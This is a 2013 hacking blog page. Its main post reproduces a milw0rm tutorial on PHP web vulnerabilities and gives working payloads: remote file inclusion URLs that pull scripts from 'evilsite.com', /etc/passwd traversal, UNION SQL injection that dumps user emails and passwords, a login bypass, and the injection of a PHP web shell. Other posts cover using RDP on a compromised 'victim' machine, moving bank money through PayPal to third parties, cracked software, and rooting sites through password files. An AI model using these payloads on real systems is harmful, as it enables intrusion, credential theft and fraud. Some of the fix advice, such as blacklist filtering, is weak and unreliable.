Blackleets - White Hat Hackers

Transfer Money From a Bank Account to a PayPal Account

2013-05-18T21:51:00.003+05:00

SALLAM its me Soldier Of God. Today i will be sharing with a very helpful tutorial

Transferring money from bank to paypal , verifying your paypal account, and then re sending money to

any third party.

http://www.youtube.com/watch?v=j7Q5_IuFoGE

Enabling RDP ON VICTIMS MACHINE

2013-04-28T17:01:00.001+05:00

Hey Guys !
Its me Aitezaz Known as Soldier Of God (SOG)

After Opening a Successful meterpreter session on victim's machine how to Enable RDP.

VIDEO LINK = http://www.youtube.com/watch?v=d-_cD2DgMFQ

Install Backtrack In Android Device full guide

2013-03-28T13:47:00.002+05:00

This thread is written by Dr.Zombie from Madleets Security team

Hello guys, today I'm going to show you the easiest way to install backtrack on an android device.
For this tutorial you need:
- Rooted android device
- Linux installer (Can be found on Google play)
- Zarchiver (Can be found on Google play)
- Busybox (Can be found on Google play)
- Android-VNC (Can be found on Google play)
- Terminal Emulator (Can be found on Google play)

(All of the programs mentioned above are free.)

Ok, now let's start:

* The first thing you need to do is install Busybox from Google play:

(AS you can see in the pic above)

* Install it, then open it when it's done, it will install some more things.
When it's done, install Linux Installer from Google Play:

* Open Linux installer, then click on Install Guides from the list on your right hand side:

* When you click that, you'll see a list of Linux distros, click on Backtrack and you will see a screen with steps on how to install it. Now click on the second page of those steps, you will get a page that looks like this:

* Just click on "Download Image", and let it finish downloading.
While it's downloading, open Google play and install Terminal Emulator, and Zarchiver.

Terminal Emulator:

* Zarchiver:

* When it finishes downloading, open Zarchiver, and look for the ZIP file that you downloaded, and extraxt the image into a root folder called "backtrack", extract the image into an external memory card not the internal one.
Once it's done, open Linux Installer again, and click on launch, you'll get a screen that looks like this:

* If it didn't recognize any distro, click on Setting > Edit then change the file path there to your backtrack image, the .img file that you extracted.
When it finally say "backtrack" on the drop down list, click "Start Linux"

* Terminal Emulator will open, you just have to proceed with the installation steps, ask you for a new password, and some preferences. When it's done you will get a red "root@localhost~#" like the picture bellow:

You are now in backtrack!

* Now if you want backtrack in GUI, open Google play, and install Android VNC:

* Open It when it finishes installing, and it will look like this:

* Set to the same settings in the picture, but not the IP address, you can get your IP by opening backtrack terminal

Settings for VNC are:

Username: backtrack
Password: backtrac
IP: from the "ifconfig" command or just put 127.0.0.1
Color Format: 24-bit

Now click connect, and boom! You'r in backtrack Desktop!

When you finis using it, remember to disconnect VNC AND exit backtrack in Terminal Emulator, else it will be taking your battery in the background.

And note that Ubuntu can be installed in the same exact way, just the username and password for VNC will change.

That's it guys, enjoy!

Greetz: Dr.Zombie from Madleets Security team and SecurityGeeks

Add bidvertiser ads under Blogger's post title (Blogspot)

2013-03-27T21:19:00.001+05:00

Well many of my friend asking me about how to ad bidvertiser ads under post title, mean they got some articles by searching on google but failed. So i decided to make this time, hope this will help you.

Lets Get started:

1) ok first make sure that you have bidvertiser account login there and get the ad's code you wish to show

2)Now goto your blogger template editing and make sure Expand widgets check box is checked.

3) Press ctrl+f and search for this code:

<b:if cond='data:blog.pageType == "static_page"'>

<data:post.body/></b:if>

4) And from here real game starts. Be carefull now above any of these two lines when you will paste the Bidvertise code You will get an error. That will be synatx error. For this first you will need to encode you Bidvertiser HTML code.

To encode your bidvertiser code click the link below:

Click Here

(Above pic shows you how to encode after going there)

after encoding you will get that code something like this:


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=521758&bid=1303342" type="text/javascript"></SCRIPT>
<noscript><a href="http://www.bidvertiser.com/bdv/BidVertiser/bdv_publisher_toolbar_creator.dbm">toolbar maker</a></noscript>


Ok Now paste this code below any of those above lines you have searched.

<b:if cond='data:blog.pageType == "static_page"'>

<data:post.body/></b:if>

above any of these line.

5) Click on preview and see the blogger's home page. if everything looking fine then click save.

6) And now you are done. Just visit your blogger and check out if it works or not.

You Can Ask in feedBacks if any problem. Regards.

Find 0day's vulnerabilities in web application

2013-03-26T18:01:00.000+05:00

This artcile is taken from milw0rm security team's paper,

Author : SirGod
Greetz goes to : SirGod

What we will cover in this lecture?

1) About

2) Some stuff

3) Remote File Inclusion

3.0 – Basic example

3.1 – Simple example
3.2 – How to fix
4) Local File Inclusion
4.0 – Basic example
4.1 – Simple example
4.2 – How to fix
5) Local File Disclosure/Download

5.0 – Basic example
5.1 – Simple example

5.2 – How to fix

6) SQL Injection
6.0 – Basic example
6.1 – Simple example
6.2 – SQL Login Bypass
6.3 – How to fix
7) Insecure Cookie Handling
7.0 – Basic example
7.1 – Simple example
7.2 – How to fix
8) Remote Command Execution
8.0 – Basic example
8.1 – Simple example
8.2 – Advanced example

8.3 – How to fix
9) Remote Code Execution
9.0 – Basic example
9.1 – Simple example
9.2 – How to fix
10) Cross-Site Scripting
10.0 – Basic example
10.1 – Another example
10.2 – Simple example
10.3 – How to fix
11) Authentication Bypass
11.0 – Basic example
11.1 – Via login variable
11.2 – Unprotected Admin CP
11.3 – How to fix
12) Insecure Permissions
12.0 – Basic example
12.1 – Read the users/passwords
12.2 – Download backups
12.3 – INC files
12.4 – How to fix
13) Cross Site Request Forgery
13.0 – Basic example
13.1 – Simple example
13.2 – How to fix

Let's get started..!!

1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the examples without the basic example of each category was founded in different scripts.

2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin. You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what configuration I use and why :

safe_mode = off ( a lot of shit cannot be done with this on )
disabled_functions = N/A ( no one,we want all )
register_globals = on ( we can set variables by request )
allow_url_include = on ( for lfi/rfi )
allow_url_fopen = on ( for lfi/rfi )
magic_quotes_gpc = off ( this will escape ‘ “ \ and NUL’s with a backslash and we don’t want that )
short_tag_open = on ( some scripts are using short tags,better on )
file_uploads = on ( we want to upload )
display_errors = on ( we want to see the script errors,maybe some undeclared variables? )

How to proceed: First,create a database to be used by different scripts.Install the script on localhost and start the audit over the source code.If you found something open the web browser and
test it,maybe you are wrong.

3) Remote File Inclusion

-Tips: You can use the NULLBYTE and ? trick. You can use HTTPS and FTP to bypass filters ( http filtered )

In PHP is 4 functions through you can include code.

require – require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.
require_once – is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.
include – includes and evaluates the specified file.
include_once - includes and evaluates the specified file during the execution of the script.

3.0 – Basic example

- Tips : some scripts don’t accept “http” in variables,”http” word is forbbiden so you can use “https” or “ftp”.

- Code snippet from test.php

———————————————–

<?php
$pagina=$_GET['pagina'];
include $pagina;
?>

———————————————–

- If we access the page we got some errors and some warnings( not pasted ) :

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

- We can see here that “pagina” variable is undeclared.We can set any value to “pagina” variable.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
Now I will show why some people use ? and after the link to the evil script.
# The “″

- Code snippet from test.php

———————————————–

<?php
$pagina=$_GET['pagina'];
include $pagina.’.php’;
?>

———————————————–

- So if we will request

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

Will not work because the script will try to include http://evilsite.com/evilscript.txt.php

So we will add a NULLBYTE ( ) and all the shit after nullbyte will not be taken in
consideration.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

The script will successfully include our evilscript and will throw to junk the things
after the nullbyte.

# The “?”

- Code snippet from test.php

———————————————–

<?php
$pagina=$_GET['pagina'];
include $pagina.’logged=1′;
?>

———————————————–

And the logged=1 will become like a variable.But better use nullbyte.Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1

The evilscript will be included succesfully.

3.1 – Simple example

Now an example from a script.

- Code snippet from index.php

—————————————————-

if (isset($_REQUEST["main_content"])){

$main_content = $_REQUEST["main_content"];

} else if (isset($_SESSION["main_content"])){

$main_content = $_SESSION["main_content"];

}

…………………..etc………………

ob_start();

require_once($main_content);

—————————————————-

We can see that “main_content” variable is requested by $_REQUEST method.The attacker can
set any value that he want. Below the “main_content” variable is include.So if we make the
following request :

http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt

Our evil script will be successfully included.

3.2 – How to fix

Simple way : Don’t allow special chars in variables.Simple way : filter the slash “/” .
Another way : filter “http” , “https” , “ftp” and “smb”.

4) Local File Inclusion

- Tips : You can use the NULLBYTE and ? trick.
../ mean a directory up
On Windows systems we can use “..\” instead of “../” .The “..\” will become “..%5C” ( urlencoded ).

The same functions which let you to include (include,include_once,require,require_once) .

4.0 – Basic example

- Code snippet from test.php

———————————–

<?php
$pagina=$_GET['pagina'];
include ‘/pages/’.$pagina;
?>

———————————–

Now,we can not include our script because we can not include remote files.We can include only
local files as you see.So if we make the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The script will include “/pages/../../../../../../etc/passwd” successfully.

You can use the and ? .The same story.

4.1 – Simple example

- Code snippet from install/install.php

————————————-

if(empty($_GET["url"]))
$url = ‘step_welcome.php’;
else
$url = $_GET["url"];
………….etc………….
<p><? include(‘step/’.$url) ?></p>

————————————-

We can see that “url” variable is injectable.If the “url” variable is not set
(is empty) the script will include “step_welcome.php” else will include the
variable set by the attacker.

So if we do the following request :

http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd

The “etc/passwd” file will be succesfully included.

4.2 – How to fix

Simple way : Don’t allow special chars in variables.Simple way : filter the dot “.”
Another way : Filter “/” , “\” and “.” .

5) Local File Disclosure/Download

- Tips : Through this vulnerability you can read the content of files,not include. Some functions which let you to read files :

file_get_contents — Reads entire file into a string
readfile — Outputs a file
file — Reads entire file into an array
fopen — Opens file or URL
highlight_file — Syntax highlighting of a file.Prints out or returns a syntax
highlighted version of the code contained in filename using the
colors defined in the built-in syntax highlighter for PHP.
show_source — Alias of highlight_file()

5.0 – Basic example

- Code snippet from test.php

————————————–

<?php
$pagina=$_GET['pagina'];
readfile($pagina);
?>

————————————–

The readfile() function will read the content of the specified file.So if we do the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The content of etc/passwd will be outputed NOT included.

5.1 – Simple example

- Code snippet from download.php

———————————————————————————–

$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header(“Pragma: public”);
header(“Expires: 0″);
header(“Cache-Control: must-revalidate, post-check=0, pre-check=0″);
header(“Content-Type: application/force-download”);
header( “Content-Disposition: attachment; filename=”.basename($file));
//header( “Content-Description: File Transfer”);
@readfile($file);
die();

———————————————————————————–

The “file” variable is unsecure.We see in first line that it is requested by $_REQUEST method.
And the file is disclosed by readfile() function.So we can see the content of an arbitrary file.
If we make the following request :

http://127.0.0.1/download.php?file=../../../../../../etc/passwd

So we can succesfully read the “etc/passwd” file.

5.2 – How to fix

Simple way : Don’t allow special chars in variables.Simple way : filter the dot “.”
Another way : Filter “/” , “\” and “.” .

6) SQL Injection

- Tips : If the user have file privileges you can read files.
If the user have file privileges and you find a writable directory and magic_quotes_gpc = off
you can upload you code into a file.

6.0 – Basic example

- Code snippet from test.php

———————————————————————————-

<?php
$id = $_GET['id'];
$result = mysql_query( “SELECT name FROM members WHERE id = ‘$id’”);
?>

———————————————————————————-

The “id” variable is not filtered.We can inject our SQL code in “id” variable.Example :

http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file(‘etc/passwd’),4–

And we get the “etc/passwd” file if magic_quotes = off ( escaping ‘ ) and users have
file privileges.

6.1 – Simple example

- Code snippet from house/listing_view.php

—————————————————————————————————————————–

$id = $_GET['itemnr'];
require_once($home.”mysqlinfo.php”);
$query = “SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id”;
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);

—————————————————————————————————————————–

We see that “id” variable value is the value set for “itemnr” and is not filtered in any way.
So we can inject our code.Lets make a request :

http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users–

And we get the email and the password from the users table.

6.2 – SQL Injection Login Bypass

- Code snippet from /admin/login.php

——————————————————————————————————————————

$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postbruger’ AND password = ‘$postpass’”)
or die(“<p>” . mysql_error() . “</p>\n”);

——————————————————————————————————————————

The variables isn’t properly checked.We can bypass this login.Lets inject the following username and password :

username : admin ‘ or ‘ 1=1
password : sirgod

We logged in.Why?Look,the code will become

———————————————————————————————————————————

$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘admin’ ‘ or ‘ 1=1 AND password = ‘sirgod’”)

———————————————————————————————————————————

Login bypassed.The username must be an existent username.

6.3 – How to fix

Simple way : Don’t allow special chars in variables.For numeric variables

use (int) ,example $id=(int)$_GET['id'];

Another way : For non-numeric variables : filter all special chars used in SQLI : – , . ( ) ‘ ” _ + / *

7) Insecure Cooke Handling

- Tips : Write the code in the URLbar,don’t use a cookie editor for this.

7.0 – Basic example

- Code snippet from test.php

—————————————————————

if($_POST['password'] == $thepass) {
setcookie(“is_user_logged”,”1″);
} else { die(“Login failed!”); }
………… etc ……………..
if($_COOKIE['is_user_logged']==”1″)
{ include “admin.php”; else { die(‘not logged’); }

—————————————————————

Something interesting here.If we set to the “is_user_logged” variable
from cookie value “1″ we are logged in.Example :

javascript:document.cookie = “is_user_logged=1; path=/”;

So practically we are logged in,we pass the check and we can access the admin panel.

7.1 – Simple example

- Code snippet from admin.php

—————————————————————-

if ($_COOKIE[PHPMYBCAdmin] == ”) {
if (!$_POST[login] == ‘login’) {
die(“Please Login:<BR><form method=post><input type=password
name=password><input type=hidden value=login name=login><input
type=submit></form>”);
} elseif($_POST[password] == $bcadminpass) {
setcookie(“PHPMYBCAdmin”,”LOGGEDIN”, time() + 60 * 60);
header(“Location: admin.php”); } else { die(“Incorrect”); }
}

—————————————————————-

Code looks exploitable.We can set a cookie value that let us to bypass the login
and tell to the script that we are already logged in.Example :

javascript:document.cookie = “PHPMYBCAdmin=LOGGEDIN; path=/”;document.cookie = “1246371700; path=/”;

What is 1246371700? Is the current time() echo’ed + 360.

7.2 – How to fix

Simple way: The most simple and eficient way : use SESSIONS .

8) Remote Command Execution

- Tips : If in script is used exec() you can’t see the command output(but the command is executed) until the result isn’t echo’ed from script.
You can use AND operator ( || ) if the script execute more than one command .

In PHP are some functions that let you to execute commands :

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output

8.0 – Basic example

- Code snippet from test.php

———————————

<?php
$cmd=$_GET['cmd'];
system($cmd);
?>

———————————

So if we make the following request :

http://127.0.0.1/test.php?cmd=whoami

The command will be executed and the result will be outputed.

8.1 – Simple example

- Code snippet from dig.php

——————————————————————————————-

$status = $_GET['status'];
$ns = $_GET['ns'];
$host   = $_GET['host'];
$query_type   = $_GET['query_type']; // ANY, MX, A , etc.
$ip     = $_SERVER['REMOTE_ADDR'];
$self   = $_SERVER['PHP_SELF'];
…………………… etc ……………………
$host = trim($host);
$host = strtolower($host);
echo(“<span class=\”plainBlue\”><b>Executing : <u>dig @$ns $host $query_type</u></b><br>”);
echo ‘<pre>’;
system (“dig @$ns $host $query_type”);

——————————————————————————————-

The “ns” variable is unfiltered and can be specified by the attacker.An attacker can use any command
that he want through this variable.

Lets make a request :

http://127.0.0.1/dig.php?ns=whoam&host=sirgod.net&query_type=NS&status=digging

The injection will fail.Why?The executed command will be : dig whoami sirgod.com NS and
will not work of course.Lets do something a little bit tricky.We have the AND operator
( || ) and we will use it to separe the commands.Example :

http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging

Our command will be executed.The command become “dig ||whoami|| sirgod.net NS”.

8.2 – Advanced example

- Code snippet from add_reg.php

——————————————————-

$user = $_POST['user'];
$pass1 = $_POST['pass1'];
$pass2 = $_POST['pass2'];
$email1 = $_POST['email1'];
$email2 = $_POST['email2'];
$location = $_POST['location'];
$url = $_POST['url'];
$filename = “./sites/”.$user.”.php”;
……………….etc………………….
$html = “<?php
\$regdate = \”$date\”;
\$user = \”$user\”;
\$pass = \”$pass1\”;
\$email = \”$email1\”;
\$location = \”$location\”;
\$url = \”$url\”;
?>”;
$fp = fopen($filename, ‘a+’);
fputs($fp, $html) or die(“Could not open file!”);

——————————————————-

We can see that the script creates a php file in “sites” directory( ourusername.php ).
The script save all the user data in that file so we can inject our evil code into one
field,I choose the “location” variable.

So if we register as an user with the location (set the “location” value) :

<?php system($_GET['cmd']); ?>

the code inside sites/ourusername.php will become :

————————————————-

<?php
$regdate = “13 June 2009, 4:16 PM”;
$user = “pwned”;
$pass = “pwned”;
$email = “pwned@yahoo.com”;
$location = “<?php system($_GET['cmd']); ?>”;
$url = “http://google.ro”;
?>

————————————————-

So we will get an parse error.Not good.We must inject a proper code to get the result that we want.

Lets inject this code :

\”;?><?php system(\$_GET['cmd']);?><?php \$xxx=\”:D

So the code inside sites/ourusername.php will become :

————————————————————–

<?php
$regdate = “13 June 2009, 4:16 PM”;
$user = “pwned”;
$pass = “pwned”;
$email = “pwned@yahoo.com”;
$location = “”;?><?php system($_GET['cmd']);?><?php $xxx=”:D”;
$url = “http://google.ro”;
?>

————————————————————–

and we will have no error.Why?See the code :

$location = “”;?><?php system($_GET['cmd']);?><?php $xxx=”:D”;

Lets split it :

——————————-

$location = “”;
?>
<?php system($_GET['cmd']);?>
<?php $xxx=”:D”;

——————————-

We set the location value to “”,close the first php tags,open the tags
again,wrote our evil code,close the tags and open other and add a variable
“xxx” because we dont want any error.I wrote that code because I want no
error,can be modified to be small but will give some errors(will not
stop us to execute commands but looks ugly).

So if we make the following request :

http://127.0.0.1/sites/ourusername.php?cmd=whoami

And our command will be succesfully executed.

8.3 – How to fix

Simple way: Don’t allow user input .

Another way : Use escapeshellarg() and escapeshellcmd() functions .

Example : $cmd=escapeshellarg($_GET’cmd’]);

9) Remote Code Execution

- Tips : You must inject valid PHP code including terminating statements ( ; ) .

9.0 – Basic example

- Code snippet from test.php

———————————–

<?php
$code=$_GET['code'];
eval($code);
?>

———————————–

The “eval” function evaluate a string as PHP code.So in this case we are able to execute
our PHP code.Examples :

http://127.0.0.1/test.php?code=phpinfo();

http://127.0.0.1/test.php?code=system(whoami);

And we will see the output of the PHP code injected by us.

9.1 – Simple example

- Code snippet from system/services/init.php

————————————————

$conf = array_merge($conf,$confweb);
}
@eval(stripslashes($_REQUEST['anticode']));
if ( $_SERVER['HTTP_CLIENT_IP'] )

————————————————

We see that the “anticode” is requested by $_REQUEST method and the coder
“secured” the input with “stripslashes” which is useless here,we don’t need
slashes to execute our php code only if we want to include a URL.So we can
inject our PHP code.Example :

http://127.0.0.1/test.php?anticode=phpinfo();

Great,injection done,phpinfo() result printed.No include because slashes are
removed,but we can use system() or another function to execute commands.

9.2 – How to fix

Simple way : Don’t allow “;” and the PHP code will be invalid.
Another way : Don’t allow any special char like “(” or “)” etc.

10) Cross-Site Scripting

- Tips : You can use alot of vectors,can try alot of bypass methods,you cand
find them around the web.

10.0 – Basic example

- Code snippet from test.php

———————————

<?php
$name=$_GET['name'];
print $name;
?>

———————————

The input is not filtered,an attacker can inject JavaScript code.Example :

http://127.0.0.1/test.php?name=<script>alert(“XSS”)</script>

A popup with XSS message will be displayed.JavaScript code succesfully executed.

10.1 – Another example

- Code snippet from test.php

——————————————-

<?php
$name=addslashes($_GET['name']);
print ‘<table name=”‘.$name.’”></table>’;
?>

——————————————-

Not an advanced example,only a bit complicated.

http://127.0.0.1/test.php?name=”><script>alert(String.fromCharCode(88,83,83))</script>

Why this vector?We put ” because we must close the ” from the “name” atribut
of the “table” tag and > to close the “table” tag.Why String.fromCharCode?Because
we want to bypass addslashes() function.Injection done.

10.2 – Simple example

- Code snippet from modules.php

—————————————————————————

if (isset($name)) {
……………….. etc…………….
} else {
die(“Le fichier modules/”.$name.”/”.$mod_file.”.php est inexistant”);

—————————————————————————

The “name” variable is injectable,input is not filtered,so we can inject
with ease JavaScript code.Example :

http://127.0.0.1/test.php?name=<script>alert(“XSS”)</script>

10.3 – How to fix

Simple way : Use htmlentities() or htmlspecialchars() functions.

Example : $name=htmlentities($_GET['name']);

Another way : Filter all special chars used for XSS ( a lot ).

(The best way is the first method.)

11) Authentication Bypass

- Tips : Look deep in the scripts,look in the admin directories,
maybe are not protected,also look for undefined variables
like “login” or “auth”.

11.0 – Basic example

I will provide a simple example of authentication bypass
via login variable.

- Code snippet from test.php

———————————

<?php
if ($logged==true) {
echo ‘Logged in.’; }
else {
print ‘Not logged in.’;
}
?>

———————————

Here we need register_gloabals = on . I will talk about php.ini
settings a bit later in this tutorial.If we set the value of $logged
variable to 1 the if condition will be true and we are logged in.
Example :

http://127.0.0.1/test/php?logged=1

And we are logged in.

11.1 – Via login variable

- Code snippet from login.php

————————————————————————————

if ($login_ok)
{
$_SESSION['loggato'] = true;
echo “<p>$txt_pass_ok</p>”;
echo”<div align=’center’><a href=’index.php’>$txt_view_entry</a> |
<a href=’admin.php’>$txt_delete-$txt_edit</a> | <a href=’install.php’>$txt_install
</a></div>”;
}

————————————————————————————

Lets see.If the “login_ok” variable is TRUE ( 1 ) the script set us a SESSION who
tell to the script that we are logged in.So lets set the “login_ok” variable to TRUE.
Example :

http://127.0.0.1/login.php?login_ok=1

Now we are logged in.

11.2 – Unprotected Admin CP

You couln’t belive this but some PHP scrips don’t protect the admin
control panel : no login,no .htaccess,nothing.So we simply we go to
the admin panel directory and we take the control of the website.
Example :

http://127.0.0.1/admin/files.php

We accessed the admin panel with a simple request.

11.3 – How to fix

- Login variable bypass : Use a REAL authentication system,don’t check the
login like that,use SESSION verification.Example :

if($_SESSION['logged']==1) {
echo ‘Logged in’; }
else { echo ‘Not logged in’;
}

- Unprotected Admin CP : Use an authentication system or use .htaccess to
allow access from specific IP’s or .htpasswd to
request an username and a password for admin CP.
Example :

.htaccess :

order deny, allow
deny from all
allow from 127.0.0.1

.htpasswd :

AuthUserFile /the/path/.htpasswd
AuthType Basic
AuthName “Admin CP”
Require valid-user

and /the/path/.htpasswd

sirgod:$apr1$wSt1u…$6yvagxWk.Ai2bD6s6O9iQ.

12) Insecure Permissions

Tips : Look deep into the files,look if the script request to be
logged in to do something,maybe the script don’t request.
Watch out for insecure permissions,maybe you can do admin
things without login.

12.0 – Basic example

We are thinking at a script who let the admin to have a lookup in
the users database through a file placed in /admin directory.That
file is named…hmmm : db_lookup.php.

- Code snippet from admin/db_lookup.php

——————————————–

<?php
// Lookup in the database
readfile(‘protected/usersdb.txt’);
?>

——————————————–

Lets think.We cannot access the “protected” directory because
is .htaccess’ed.But look at this file,no logged-in check,nothing.
So if we acces :

http://127.0.0.1/admin/db_lookup.php

We can see the database.Remember,this is only an example created by
me,not a real one,you can find this kind of vulnerabilities in scripts.

12.1 – Read the users/passwords

Oh yeah,some coders are so stupid.They save the usernames and passwords
in text files,UNPROTECTED.A simple example from a script :

http://127.0.0.1/userpwd.txt

And we read the file,the usernames and passwords are there.

12.2 – Download Backups

Some scripts have database backup functions,some are safe,some are not safe.
I will show you a real script example :

- Code snippet from /adminpanel/phpmydump.php

——————————————————————————–

function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) {
$con=@mysql_connect(“localhost”,$uid, $pwd) or die(“Could not connect”);
$db=@mysql_select_db($dbname,$con) or die(“Could not select db”);
………………………… etc ……………………..
mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);

——————————————————————————–

After a lof of code the function is called.I don’t pasted the entire code
because is huge.I analyzed the script,no login required,no check,nothing.So
if we access the file directly the download of the backup will start.Example :

http://127.0.0.1/adminpanel/phpmydump.php

Now we have the database backup saved in our computer.

12.3 – INC files

Some scripts saves important data in INC files.Usually in INC files is PHP
code containing database configuration.The INC files can be viewed in
browser even they contain PHP code.So a simple request will be enough to
access and read the file.Example :

http://127.0.0.1/inc/mysql.inc

Now we have the database connection details.Look deep in scripts,is more
scripts who saves important data into INC files.

12.4 – How to fix

- Basic example : Check if the admin is logged in,if not,redirect.

- Read the users/passwords : Save the records in a MySQL database
or in a protected file/directory.

- Download Backups : Check if the admin is logged in,if not,redirect.

- INC files : Save the configuration in proper files,like .php or
protect the directory with an .htaccess file.

13) Cross Site Request Forgery

- Tips : Through CSRF you can change the admin password,is not
so inofensive.
Can be used with XSS,redirected from XSS.

13.0 – Basic example

- Code snippet from test.php

—————————————–

<?php
check_auth();
if(isset($_GET['news']))
{ unlink(‘files/news’.$news.’.txt’); }
else {
die(‘File not deleted’); }
?>

—————————————–

In this example you will see what is CSRF and how it works.In the “files”
directory are saved the news written by the author.The news are saved like
“news1.txt”,”news2.txt” etc. So the admin can delete the news.The news that
he want to delete will be specified in “news” variable.If he want to delete
the news1.txt the value of “news” will be “1″.We cannot execute this without
admin permissions,look,the script check if we are logged in.
I will show you an example.If we request :

http://127.0.0.1/test.php?news=1

The /news/news1.txt file will be deleted.The script directly delete the file
without any notice.So we can use this to delete a file.All we need is to trick
the admin to click our evil link and the file specified by us in the “news”
variable will be deleted.

13.1 – Simple example

In a way the codes below are included in the index.php file ,I
will not paste all the includes,there are a lot.

- Code snippet from includes/pages/admin.php——————————————————————–

if ($_GET['act'] == ”) {
include “includes/pages/admin/home.php”;
} else {
include “includes/pages/admin/” . $_GET['act'] . “.php”;

——————————————————————–

Here we can see how the “includes/pages/admin/members.php” is included in
this file.If “act=members” the file below will be included.

- Code snippet from includes/pages/admin/members.php

———————————————————————————————-

if ($_GET['func'] == ‘delete’) {
$del_id = $_GET['id'];
$query2121 = “select ROLE from {$db_prefix}members WHERE ID=’$del_id’”;
$result2121 = mysql_query($query2121) or die(“delete.php – Error in query: $query2121″);
while ($results2121 = mysql_fetch_array($result2121)) {
$their_role = $results2121['ROLE'];
}
if ($their_role != ’1′) {
mysql_query(“DELETE FROM {$db_prefix}members WHERE id=’$del_id’”) or die(mysql_error
());

———————————————————————————————-

We can see here that if “func=delete” will be called by URL,the script will
delete from the database a user with the specified ID ( $id ) without any
confirmation.Example :

http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4

The script check if the admin is logged in so if we trick the admin to click
our evil link the user who have the specified ID in the database will be deleted
without any confirmation.

13.2 – How to fix

- Simple way : Use tokens.At each login,generate a random token and save it
in the session.Request the token in URL to do administrative
actions,if the token missing or is wrong,don’t execute the
action.I will show you only how to to check if the token
is present and is correct.Example :

——————————————————-

<?php
check_auth();
if(isset($_GET['news']) && $token=$_SESSION['token'])
{ unlink(‘files/news’.$news.’.txt’); }
else {
die(‘Error.’); }
?>

——————————————————-

The request will look like this one :

http://127.0.0.1/index.php?delete=1&token=[RANDOM_TOKEN]

So this request will be fine,the news will be deleted.

- Another way : Do some complicated confirmations or request a password

to do administrative actions

Black Hat Hacking Videos

2013-03-25T15:35:00.000+05:00

So guys i've created a new page here with a big collection of Black Hat Videos provided by "Bagus NewBie" a very good friend of mine. Purpose of sharing these videos is to aware people how the hackers hack into the System and web application. Yes Web Application hacking and security's videos are also mentioned
there so here is the direct link the page:

Click The Link Below:

Click Here

Make your computer Faster like professionals

2013-03-22T15:18:00.001+05:00

Well sometimes computer behaves strangely. Like hanging again and again when open up or install any program. sometimes this is because for viruses and harmful files in it. But what if it's still behaving same after scanning and removing the virus?
Seems like your hard derive might need defragement or temporary files are loaded too much or it night have some registry files corrupted.

1. First what you should do is, run disc clean up by going to the system reserved derive (where your windows is installed). Right click on it and select properties and you will see a option "disc cleanup"
Example:

it will scan . give it some time.

After it will show new window something like this:

click on clean up system files. it will ask your permission click ok and your disc will be leaned up.

2. Ok after that you should run virus scan on your computer. You can choose any good antivirus of your choice. But I suggest or recommend you to use security essentials from Microsoft (for windows)

Download Security Essentials:

Click Here

am not supposing to tell you how to install and run it. But one thing i would like to mention that your windows copy must be geniune to install this and after installing then first update this (Your computer must be connected with Internet to Update it)

Then run "Custom Scan" and after scanning you will get some options, select the option of your choice. It will cleanup all the harmful files from your computer to perform your PC well.

3. Ok final step is that there might be some registry files corrupted or something like that. That also can cause to slow down you pc speed. I Recommend another tool.

Download Advance system care:

Click Here

(Special thanks to " Raja Zulqernain " for providing this with keys. I recommend you to visit here on his blog www.h4ck3rcracks.blogspot.com to get cracked tools and games)

*After downloading and installing. You will see window something like this:

Did you see how many features it has ?

Ok now click on "Scan Now" as you can see in pic above. And wait a while until it scans the problems. After few minutes you will see new window something like this:

If you get this message "some problems found" then click on "Repair Now".

and I recommend to Restart Your computer after these operations and for sure your Pc speed will be increased as well.

Regards.

Rooting Web Pages without Exploit

2013-03-21T14:34:00.001+05:00

Autohrs of this tutorial : Virtual Circuit and Psychotic

Getting the Password File Through FTP Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little difference, it's shadowed.
Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text).

Below is another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
